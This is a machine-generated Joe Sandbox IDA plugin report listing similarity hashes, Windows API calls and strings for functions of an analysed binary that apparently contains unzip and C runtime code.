                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: EnumLocalesSystem
                                        • String ID:
                                        • API String ID: 2099609381-0
                                        • Opcode ID: 961766b1373d32e20d781233b65e77b415bb57fe1c1931dd36f2c4f9580da8de
                                        • Instruction ID: 24001c68db538805d743db4dfa3dc963df6247e151c5e03366915cc87b7c35c7
                                        • Opcode Fuzzy Hash: 961766b1373d32e20d781233b65e77b415bb57fe1c1931dd36f2c4f9580da8de
                                        • Instruction Fuzzy Hash: C0E092727652118AD7205F30FC057993AA5BB10B05FA6013EE420C10F0CFF944CB8A0C
                                        APIs
                                        • EnumSystemLocalesA.KERNEL32(0041709F,00000001,004259A8,?,00425924,0041303A,?,00428D8C,?,?,?,00000000), ref: 00417088
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: EnumLocalesSystem
                                        • String ID:
                                        • API String ID: 2099609381-0
                                        • Opcode ID: 01c282eb77641323e9fe874f6d02881c1e97bfe8ac1b72935f4c6e12c196c4f6
                                        • Instruction ID: bae1840d9773f24e5d2ffe4de356391a1d12f5d8f190a3d469efc6c2ed09b3b8
                                        • Opcode Fuzzy Hash: 01c282eb77641323e9fe874f6d02881c1e97bfe8ac1b72935f4c6e12c196c4f6
                                        • Instruction Fuzzy Hash: 4CD05E727623118AD7105F30AD097A93E68AB14F0AFA1886DD910C50E1CAF948C9860C
                                        APIs
                                        • GetLocaleInfoA.KERNEL32(00000400,0000001D,?,00000002,?,00409426), ref: 00411CFF
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID:
                                        • API String ID: 2299586839-0
                                        • Opcode ID: 3063c24a5b71c23c923af5feb8ca0f4c4c71082d0ad2a5863e7f5c886da2b426
                                        • Instruction ID: d2ed403ade62f16da6ef4183f008dc4ef17a0cac864e46f49f16e908037ef13a
                                        • Opcode Fuzzy Hash: 3063c24a5b71c23c923af5feb8ca0f4c4c71082d0ad2a5863e7f5c886da2b426
                                        • Instruction Fuzzy Hash: DDD012B524C34075FA280F226C47FE737985B48B01F24905AFB91AB2D2D7A898455A39
                                        APIs
                                          • Part of subcall function 0040F6B0: GetVersion.KERNEL32(004028AB,?,?,ZIPINFOOPT,?,?,?,00401014,?,?,0041492C,00573F70), ref: 0040F6BA
                                        • CreateFileA.KERNEL32(?,00000100,00000003,00000000,00000003,02000000,00000000,00000000,?,00000000,?,00403F26,?), ref: 0040FF28
                                        • GetLastError.KERNEL32(00000000,?,00000001), ref: 0041005E
                                        Strings
                                        • warning: SetFileTime() for %s error %d, xrefs: 004100EF
                                        • set attrib: %-22s , xrefs: 0040FF55
                                        • warning: CreateFile() error %d (set file times for %s), xrefs: 00410065
                                        • compressed WinNT security data missing (%d bytes)%s, xrefs: 0040FFEB
                                        • %-22s , xrefs: 0040FFB7
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: CreateErrorFileLastVersion
                                        • String ID: compressed WinNT security data missing (%d bytes)%s$ set attrib: %-22s $%-22s $warning: SetFileTime() for %s error %d$warning: CreateFile() error %d (set file times for %s)
                                        • API String ID: 2621615039-3452739180
                                        • Opcode ID: 2b806aec2b57c61612aba36cfce3f43dab4ac99dab400fed94529667076e6c1e
                                        • Instruction ID: edb26e619037c44488cf69f2599f5cd4dd598bd07b404ecfb4a3fc13bc9991ba
                                        • Opcode Fuzzy Hash: 2b806aec2b57c61612aba36cfce3f43dab4ac99dab400fed94529667076e6c1e
                                        • Instruction Fuzzy Hash: 6051F9757803007BE720AB65BC47FB3365E9B54B15F94442BF909D22C2E6FEAC90826D
                                        APIs
                                        • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,0041A4B1,?,Microsoft Visual C++ Runtime Library,00012010,?,00423494,?,004234E4,?,?,?,Runtime Error!Program: ), ref: 0041BABD
                                        • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0041BAD5
                                        • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0041BAE6
                                        • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0041BAF3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll$4B
                                        • API String ID: 2238633743-2289559369
                                        • Opcode ID: 09a95b68fad4e2ac73f20e07bd1e8fe16aafe990b9da3c80e5661cf0b665ca6f
                                        • Instruction ID: 9c9cf768bb1ba27c629e3c903df4a55c7cd1ab91446db272b6502811c55c3a36
                                        • Opcode Fuzzy Hash: 09a95b68fad4e2ac73f20e07bd1e8fe16aafe990b9da3c80e5661cf0b665ca6f
                                        • Instruction Fuzzy Hash: 9C017531304316AB8720DFB5AC84EA77AB8EB48681754443BA946C2725D778DC46C79C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: --- Press `Q' to quit, or any other key to continue ---$[ %s ]$nircmdc.exe$warning: extra field too long (%d). Ignoring...$warning: filename too long--truncating.
                                        • API String ID: 0-1331371059
                                        • Opcode ID: a089861949e6340726d744b7c5c5a373a40e7235673de09a17e0cbd3ad2df153
                                        • Instruction ID: 51b1e297df8a976b1ee28b2c1833878725061e8c3fbe01eded018527f9c4d9f5
                                        • Opcode Fuzzy Hash: a089861949e6340726d744b7c5c5a373a40e7235673de09a17e0cbd3ad2df153
                                        • Instruction Fuzzy Hash: 39C13B71B4C3416AEB209F2CAC45B667B55AB11318F28507BE881673C2D2BDBC46C39F
                                        APIs
                                        • CreateFileA.KERNEL32(CONIN$,C0000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,004075BA), ref: 00412150
                                        • GetConsoleMode.KERNEL32(00000000,?,?,?,004075BA), ref: 00412166
                                        • SetConsoleMode.KERNEL32(00000000,00000001,?,?,004075BA), ref: 00412173
                                        • ReadFile.KERNEL32(00000000,?,00000001,?,00000000,?,?,?,004075BA), ref: 0041218F
                                        • ReadFile.KERNEL32(00000000,?,00000001,00000001,00000000), ref: 004121BA
                                        • SetConsoleMode.KERNEL32(00000000,?,?,?,004075BA), ref: 004121DD
                                        • CloseHandle.KERNEL32(00000000,?,?,004075BA), ref: 004121E4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: ConsoleFileMode$Read$CloseCreateHandle
                                        • String ID: CONIN$
                                        • API String ID: 4003642833-3033795042
                                        • Opcode ID: 3e96ca424909fdc7b0da6d46b6abef9ef331b44d0c6254d227a55d37fe738f75
                                        • Instruction ID: e7930273b9cbbd300fa439537dbf3610411437395ea581ac5f8278a4b0bfe79b
                                        • Opcode Fuzzy Hash: 3e96ca424909fdc7b0da6d46b6abef9ef331b44d0c6254d227a55d37fe738f75
                                        • Instruction Fuzzy Hash: 4F11E436700311FBE621DB159C49FEB7768AB84720F108525FE10E61C0D7B499898B6E
                                        APIs
                                        • lstrlenA.KERNEL32(?), ref: 0041235C
                                          • Part of subcall function 00412550: CreateMutexA.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00412334), ref: 00412566
                                        • EnterCriticalSection.KERNEL32(00429220), ref: 0041240D
                                        • lstrcmpiA.KERNEL32(00429118,?), ref: 00412428
                                        • LeaveCriticalSection.KERNEL32(00429220), ref: 0041243F
                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00412461
                                        • GetDriveTypeA.KERNEL32(?), ref: 00412493
                                        • EnterCriticalSection.KERNEL32(00429220), ref: 004124BD
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Enter$CreateDriveInformationLeaveMutexTypeVolumelstrcmpilstrlen
                                        • String ID:
                                        • API String ID: 3268418500-0
                                        • Opcode ID: d8ef268f65cd5ebb51ce9872d8032ae48db8673499c663791f14b6ff2cf88466
                                        • Instruction ID: 2886dcb7fcb796122c9e5b216d3458b3906ab7dde395389191bfab681fb0c28f
                                        • Opcode Fuzzy Hash: d8ef268f65cd5ebb51ce9872d8032ae48db8673499c663791f14b6ff2cf88466
                                        • Instruction Fuzzy Hash: 8F51F7316083559FE320CF25E9457EBBBD4AB95300F54482EE890C3381D6BCDD9AC7AA
                                        APIs
                                        • LCMapStringW.KERNEL32(00000000,00000100,004231C4,00000001,00000000,00000000,00000103,00000001,?,?,0041B122,00200020,00000000,?,?,00000000), ref: 004191D1
                                        • LCMapStringA.KERNEL32(00000000,00000100,004231C0,00000001,00000000,00000000,?,0041B122,00200020,00000000,?,?,00000000,00000001), ref: 004191ED
                                        • LCMapStringA.KERNEL32(?,?,00000000,00200020,0041B122,?,00000103,00000001,?,?,0041B122,00200020,00000000,?,?,00000000), ref: 00419236
                                        • MultiByteToWideChar.KERNEL32(?,00000002,00000000,00200020,00000000,00000000,00000103,00000001,?,?,0041B122,00200020,00000000,?,?,00000000), ref: 0041926E
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,0041B122,00200020,00000000), ref: 004192C6
                                        • LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,0041B122,00200020,00000000), ref: 004192DC
                                        • LCMapStringW.KERNEL32(?,?,0041B122,00000000,0041B122,?,?,0041B122,00200020,00000000), ref: 0041930F
                                        • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,0041B122,00200020,00000000), ref: 00419377
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: String$ByteCharMultiWide
                                        • String ID:
                                        • API String ID: 352835431-0
                                        • Opcode ID: 26d0b9452b8bc0e299162577c32f6f33c8d5b4764b2a63f7722eed71b1d7e419
                                        • Instruction ID: 55b7dface7ca53413e5a610a34780f482f7b03c06cfb318d5c2bd6adb41ae378
                                        • Opcode Fuzzy Hash: 26d0b9452b8bc0e299162577c32f6f33c8d5b4764b2a63f7722eed71b1d7e419
                                        • Instruction Fuzzy Hash: 0B515B31500209FBCF218F95CD49EEF7BB5FB49754F10412AF924A22A0D3398DA1DB69
                                        APIs
                                          • Part of subcall function 0040F6B0: GetVersion.KERNEL32(004028AB,?,?,ZIPINFOOPT,?,?,?,00401014,?,?,0041492C,00573F70), ref: 0040F6BA
                                        • IsValidSecurityDescriptor.ADVAPI32(?), ref: 00412217
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00412237
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: DescriptorSecurity$DaclValidVersion
                                        • String ID:
                                        • API String ID: 1532089921-0
                                        • Opcode ID: 0d93435f18004ed9e29ac5f9650c3a45ac4ace9d854fa5dae8183bc654cd503a
                                        • Instruction ID: 6816d2660224887e43d6666693bd05513e1fa9988970b9181180d49af46b03ac
                                        • Opcode Fuzzy Hash: 0d93435f18004ed9e29ac5f9650c3a45ac4ace9d854fa5dae8183bc654cd503a
                                        • Instruction Fuzzy Hash: B831A7367002225BA710DB2DED80DFF77E8EEC4754F84486AF854C2210F778D95946B6
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 0041A3FA
                                        • GetStdHandle.KERNEL32(000000F4,00423494,00000000,?,00000000,00000000), ref: 0041A4D0
                                        • WriteFile.KERNEL32(00000000), ref: 0041A4D7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: File$HandleModuleNameWrite
                                        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                        • API String ID: 3784150691-4022980321
                                        • Opcode ID: 04c2ac82d4cdaaabc69ab33a94a316821a7cf5c4c0c799cd293786380b4abd52
                                        • Instruction ID: 7a0306bc7714f66003fee43fc566662e0915a3c579c87e485ca05bdabf1bfbee
                                        • Opcode Fuzzy Hash: 04c2ac82d4cdaaabc69ab33a94a316821a7cf5c4c0c799cd293786380b4abd52
                                        • Instruction Fuzzy Hash: FB31C572702218AFDF20EA61DC4AFDE776C9B45344F9004AFF944D6140D6BCEAD48A5E
                                        APIs
                                        • CompareStringW.KERNEL32(00000000,00000000,004231C4,00000001,004231C4,00000001,00000000,00000000,00000000,0041C6AA,00000000,00000000,7591DF80,00000000,00000000), ref: 0041CE4D
                                        • CompareStringW.KERNEL32(00000000,7591DF80,00000000,00000000,0041C6AA,00000000,00000000,00000000,00000000,0041C6AA,00000000,00000000,7591DF80,00000000,00000000), ref: 0041CEB3
                                        • CompareStringA.KERNEL32(00000000,00000000,004231C0,00000001,004231C0,00000001,?,?,00000000,0041C134,00000000,00000000,?,?,?,0040144E), ref: 0041CEC9
                                        • WideCharToMultiByte.KERNEL32(00000000,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0041C6AA,00000000,00000000,7591DF80,00000000), ref: 0041CF0C
                                        • WideCharToMultiByte.KERNEL32(?,00000220,?,?,?,?,00000000,00000000), ref: 0041CF66
                                        • WideCharToMultiByte.KERNEL32(?,00000220,?,?,00000000,00000000,00000000,00000000), ref: 0041CF7E
                                        • WideCharToMultiByte.KERNEL32(?,00000220,?,?,?,?,00000000,00000000), ref: 0041CFD6
                                        • CompareStringA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000), ref: 0041CFF4
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: ByteCharCompareMultiStringWide
                                        • String ID:
                                        • API String ID: 1117519366-0
                                        • Opcode ID: a411932ad2318a4f170b5595e3798524a948137154e595a0eb41b66fa8cbb120
                                        • Instruction ID: a774bcca2041765d8996282b2f32d3625f26fdb7b7df1d6986941dd8b1866f47
                                        • Opcode Fuzzy Hash: a411932ad2318a4f170b5595e3798524a948137154e595a0eb41b66fa8cbb120
                                        • Instruction Fuzzy Hash: 26516A71A40209EBCF218F95CC85DEF7F79FB49754F20411AF811A1260D73989A1DBA8
                                        APIs
                                        • LCMapStringW.KERNEL32(00000000,00000100,004231C4,00000001,00000000,00000000,7591DF80,00000002,00000000,00000000,0041C6AA,00000000,00000000,7591DF80,00000000,00000000), ref: 0041D1A7
                                        • LCMapStringA.KERNEL32(00000000,00000100,004231C0,00000001,00000000,00000000,?,?,00000000,0041C134,00000000,00000000,?,?,?,0040144E), ref: 0041D1C3
                                        • LCMapStringW.KERNEL32(00000000,7591DF80,00000000,00000000,0041C6AA,00000000,7591DF80,00000002,00000000,00000000,0041C6AA,00000000,00000000,7591DF80,00000000,00000000), ref: 0041D20C
                                        • WideCharToMultiByte.KERNEL32(00000000,00000220,00000000,00000000,00000000,00000000,00000000,00000000,7591DF80,00000002,00000000,00000000,0041C6AA,00000000,00000000,7591DF80), ref: 0041D23F
                                        • WideCharToMultiByte.KERNEL32(?,00000220,?,?,?,?,00000000,00000000), ref: 0041D296
                                        • LCMapStringA.KERNEL32(?,?,?,?,00000000,00000000), ref: 0041D2B2
                                        • LCMapStringA.KERNEL32(?,?,?,?,?,00000000), ref: 0041D308
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: String$ByteCharMultiWide
                                        • String ID:
                                        • API String ID: 352835431-0
                                        • Opcode ID: 6909be8c5c249c1ea830a7f530855667d4e0118645d5f77b012ba46e2979939f
                                        • Instruction ID: f32d3add464206e8e0aed92ca822318019ba77b5f644faad787136d3d6fb05ee
                                        • Opcode Fuzzy Hash: 6909be8c5c249c1ea830a7f530855667d4e0118645d5f77b012ba46e2979939f
                                        • Instruction Fuzzy Hash: 62518FB1901219FBCF228F91DC45AEF7F75FF09750F148016F925A1260C7398992DBAA
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,004148FC), ref: 0041A06D
                                        • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,004148FC), ref: 0041A081
                                        • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,004148FC), ref: 0041A0AD
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,004148FC), ref: 0041A0E5
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,004148FC), ref: 0041A107
                                        • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,?,004148FC), ref: 0041A120
                                        • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,004148FC), ref: 0041A133
                                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041A171
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                        • String ID:
                                        • API String ID: 1823725401-0
                                        • Opcode ID: c8d47bca2f00aef09e3c29924055f81ad138db5fe313db441fa83e7eab80b45a
                                        • Instruction ID: 55f3ef25e741e715063bb0b53fb3b0197acadb47fa1d7b83ba552b9266e1e871
                                        • Opcode Fuzzy Hash: c8d47bca2f00aef09e3c29924055f81ad138db5fe313db441fa83e7eab80b45a
                                        • Instruction Fuzzy Hash: 0331E67250A2157FD7207FB59C848BBBA9CEA49354F15053BF952C3201E7698CD1826F
                                        APIs
                                        • HeapAlloc.KERNEL32(00000000,00002020,?,?,?,?,0041767B), ref: 004181FA
                                        • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,?,?,0041767B), ref: 0041821E
                                        • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,?,?,0041767B), ref: 00418238
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0041767B), ref: 004182F9
                                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,0041767B), ref: 00418310
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: AllocVirtual$FreeHeap
                                        • String ID: hB$hB$hB
                                        • API String ID: 714016831-3407773006
                                        • Opcode ID: 21d0b8c3c549ef3f006421a9cbb870f42be1103d9f1cbd472c759b23aba7fc12
                                        • Instruction ID: 3deade5512a951a36e16256948898a48dfe75dffd287a545e5a0f75b2dea7774
                                        • Opcode Fuzzy Hash: 21d0b8c3c549ef3f006421a9cbb870f42be1103d9f1cbd472c759b23aba7fc12
                                        • Instruction Fuzzy Hash: 6A311271A40B01DBD3329F29DC40BA6B6E4EB44B54F11813FF56597290EB78A881DB4C
                                        APIs
                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00412334), ref: 00412566
                                        • InterlockedExchange.KERNEL32(00428D6C,00000000), ref: 00412582
                                        • InterlockedExchange.KERNEL32(00428D6C,00000000), ref: 00412590
                                        • CloseHandle.KERNEL32(00000000), ref: 00412593
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041259C
                                        • ReleaseMutex.KERNEL32(00000000), ref: 004125A3
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: ExchangeInterlockedMutex$CloseCreateHandleObjectReleaseSingleWait
                                        • String ID:
                                        • API String ID: 1537229248-0
                                        • Opcode ID: 2233b778cae926ed051bf37e10cc9fba4f9749033d4a10a0707beef56968d8a8
                                        • Instruction ID: b0480333715e69541531a0b31537b6c343dc41711bcec5a2d42a26cd8254ad3b
                                        • Opcode Fuzzy Hash: 2233b778cae926ed051bf37e10cc9fba4f9749033d4a10a0707beef56968d8a8
                                        • Instruction Fuzzy Hash: 27017976751135BBE620176ABC84FCA7A54DB98761F504036FB04C1290CAE54855867D
                                        APIs
                                        • GetStringTypeW.KERNEL32(00000001,004231C4,00000001,00000000,7591DF80,00000002,00000000,00000000,0041C6AA,00000000,00000000,7591DF80), ref: 0041A73C
                                        • GetStringTypeA.KERNEL32(00000000,00000001,004231C0,00000001,?), ref: 0041A756
                                        • GetStringTypeW.KERNEL32(00000100,7591DF80,00000000,00000000,7591DF80,00000002,00000000,00000000,0041C6AA,00000000,00000000,7591DF80), ref: 0041A77D
